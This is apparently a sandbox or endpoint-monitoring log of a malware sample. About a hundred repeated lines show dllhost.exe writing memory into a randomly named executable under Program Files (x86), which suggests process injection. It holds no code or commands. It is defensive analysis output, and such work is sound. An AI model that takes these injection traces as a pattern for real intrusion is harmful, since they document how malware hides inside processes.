Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1030000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1050000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 9B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1150000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1170000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: EF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 640000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 660000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 12E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1370000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 11E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1200000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 610000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 630000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1430000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1450000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 660000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 680000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 13F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1410000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1280000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 12A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 500000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 520000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: EA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: EC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 390000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 3B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 8D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 8F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1020000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1040000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 13E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1400000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 13F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1410000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1130000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1150000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1340000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1360000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1460000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1480000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 750000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 770000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1350000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1370000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 6E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 700000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: CB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 770000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 790000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: AF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: AD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: AF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: AD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1000000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 760000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1140000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 760000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1140000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1250000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1410000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: A70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1410000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: A70000
